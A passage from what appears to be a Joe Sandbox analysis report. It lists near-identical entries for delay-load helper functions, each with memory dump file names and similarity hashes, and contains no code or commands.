                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F556
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 286e2a4150032d9764be67852548d1165e5a1b00bc0aeddc772b8bb3f716b2e6
                                                                              • Instruction ID: 71d4ee1df2221b6fa5d8e2cac609f6bd9a079b5ee8aff75974fee4ebcf3e81c3
                                                                              • Opcode Fuzzy Hash: 286e2a4150032d9764be67852548d1165e5a1b00bc0aeddc772b8bb3f716b2e6
                                                                              • Instruction Fuzzy Hash: 3AB012C16E82087F720463147C13F3A014CC0C4B11734403AF880C1140D8408C081331
                                                                              Function 00D3F699 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F6AB
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 585507707f0ac4fbec81499ef7a9424cb628fa1905a5f0290e2d8e3ef91b5a4a
                                                                              • Instruction ID: 2415de1d38b370c6f8b7a81e93c6f42dd3dffdbd46c74c4df991b043638c0ff7
                                                                              • Opcode Fuzzy Hash: 585507707f0ac4fbec81499ef7a9424cb628fa1905a5f0290e2d8e3ef91b5a4a
                                                                              • Instruction Fuzzy Hash: 96B012CA6790047D36043310BD03D3A010CC8C0B11730813AFC40D808194424D090631
                                                                              Function 00D3F6B4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F6AB
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: a169557306cdecbbb2ec4528e4d271a228b052a9f6c81bffefc07249cf0521f2
                                                                              • Instruction ID: 575abe95e7efac4f5158eb10f970d057fb0fcf8b1a23b60c4821baa42c4bd45d
                                                                              • Opcode Fuzzy Hash: a169557306cdecbbb2ec4528e4d271a228b052a9f6c81bffefc07249cf0521f2
                                                                              • Instruction Fuzzy Hash: 6BB012C26781047D374473243C03E3A050CC4C4B11730423AFC40C0284D4414C4C1731
                                                                              Function 00D3F6BE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F6AB
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 38b1ff0867ea117bee2fc07c92748738a725f4899d609841dc217c461d69f6a6
                                                                              • Instruction ID: 13764c7ca620018ad616a61084a73e346ef99323d877a9b8f2873449ad6e3f1f
                                                                              • Opcode Fuzzy Hash: 38b1ff0867ea117bee2fc07c92748738a725f4899d609841dc217c461d69f6a6
                                                                              • Instruction Fuzzy Hash: FEB012C66780047D364473243D03E3A010CC0C4B11730813AFC40C8184D4414C0D0731
                                                                              Function 00D3F71F Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F70C
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: d6f9f6fb6d675aed7bfb42dd5213a054781592971e996b3ef8328dd6e92d0f0d
                                                                              • Instruction ID: 24a8eb2ea4ad75ab2913937a4091cf17d66906e2bd841101f7617631e3545937
                                                                              • Opcode Fuzzy Hash: d6f9f6fb6d675aed7bfb42dd5213a054781592971e996b3ef8328dd6e92d0f0d
                                                                              • Instruction Fuzzy Hash: 96B012C56782067D320467143D47F3A210CC4C0B11730443AF840C4140D4804E490231
                                                                              Function 00D3F733 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F70C
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: f97a6c84028471efef791a7e10d3ce410edba988b5146f260de1ecaf6a4140b5
                                                                              • Instruction ID: 0390627cd9ca16e82d1fd04e10809216f5a862c04c3220ef1d4dee4dadf83846
                                                                              • Opcode Fuzzy Hash: f97a6c84028471efef791a7e10d3ce410edba988b5146f260de1ecaf6a4140b5
                                                                              • Instruction Fuzzy Hash: E4B012C16783067D325463153C07F3A210CC4C0B11730493AF840C0140D4404D880331
                                                                              Function 00D3F73D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F70C
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 514cba1c4349178e0bde6b7e4fa4d0c8172a7204bd538f26faec84d61cbf92d3
                                                                              • Instruction ID: 1b65adcef1bc10e349357e293c79d7160d4d21bfab1a9315034d301e565d3e0c
                                                                              • Opcode Fuzzy Hash: 514cba1c4349178e0bde6b7e4fa4d0c8172a7204bd538f26faec84d61cbf92d3
                                                                              • Instruction Fuzzy Hash: 8EB012C16782067D321463153C07F3E250CC4C0B11730843AFC40C5144D4404D4C0231
                                                                              Function 00D3F3D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F33D
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 55d79ae696aaf1b5924086c311bef473a38d073319c478297033b1a0118f0ef2
                                                                              • Instruction ID: 151086aa82a5111e8fb74d986dac6c02ed2f86f9acd256d792b3bda1709955fa
                                                                              • Opcode Fuzzy Hash: 55d79ae696aaf1b5924086c311bef473a38d073319c478297033b1a0118f0ef2
                                                                              • Instruction Fuzzy Hash: 2DA002955691077D355553516D17D3A161DC4D4B51734452EF841C405194405D495531
                                                                              Function 00D3F3F5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F33D
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 769f5716ba798b186922db5afabd775f309db7a3905013b17e3d0fceaaaa631f
                                                                              • Instruction ID: 151086aa82a5111e8fb74d986dac6c02ed2f86f9acd256d792b3bda1709955fa
                                                                              • Opcode Fuzzy Hash: 769f5716ba798b186922db5afabd775f309db7a3905013b17e3d0fceaaaa631f
                                                                              • Instruction Fuzzy Hash: 2DA002955691077D355553516D17D3A161DC4D4B51734452EF841C405194405D495531
                                                                              Function 00D3F3FF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F33D
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 93f0c9605c53479532ee0d97fb461e3ae7c85303957d9d706ef91a4b3c9f677d
                                                                              • Instruction ID: 151086aa82a5111e8fb74d986dac6c02ed2f86f9acd256d792b3bda1709955fa
                                                                              • Opcode Fuzzy Hash: 93f0c9605c53479532ee0d97fb461e3ae7c85303957d9d706ef91a4b3c9f677d
                                                                              • Instruction Fuzzy Hash: 2DA002955691077D355553516D17D3A161DC4D4B51734452EF841C405194405D495531
                                                                              Function 00D3F3EB Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F33D
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 73bcebbb1ca96afbc56221bb04912dc84d411e54eccd3b975dfecf4d2c29c323
                                                                              • Instruction ID: 151086aa82a5111e8fb74d986dac6c02ed2f86f9acd256d792b3bda1709955fa
                                                                              • Opcode Fuzzy Hash: 73bcebbb1ca96afbc56221bb04912dc84d411e54eccd3b975dfecf4d2c29c323
                                                                              • Instruction Fuzzy Hash: 2DA002955691077D355553516D17D3A161DC4D4B51734452EF841C405194405D495531
                                                                              Function 00D3F3B9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F33D
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: b5bddfa302c52349950e6f2f79f11b27616deb00bc483c0a1dbeef9e2645b8f1
                                                                              • Instruction ID: 151086aa82a5111e8fb74d986dac6c02ed2f86f9acd256d792b3bda1709955fa
                                                                              • Opcode Fuzzy Hash: b5bddfa302c52349950e6f2f79f11b27616deb00bc483c0a1dbeef9e2645b8f1
                                                                              • Instruction Fuzzy Hash: 2DA002955691077D355553516D17D3A161DC4D4B51734452EF841C405194405D495531
                                                                              Function 00D3F373 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F33D
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 0b6b39728ec0979d062e6b31d660c0be6a77fffd13dc946777b22bd017ed2009
                                                                              • Instruction ID: 151086aa82a5111e8fb74d986dac6c02ed2f86f9acd256d792b3bda1709955fa
                                                                              • Opcode Fuzzy Hash: 0b6b39728ec0979d062e6b31d660c0be6a77fffd13dc946777b22bd017ed2009
                                                                              • Instruction Fuzzy Hash: 2DA002955691077D355553516D17D3A161DC4D4B51734452EF841C405194405D495531
                                                                              Function 00D3F413 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F33D
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 11e7c1e98eefbae33161ab9e36a388e07dd9e6b02e3134174e79558abde0ebed
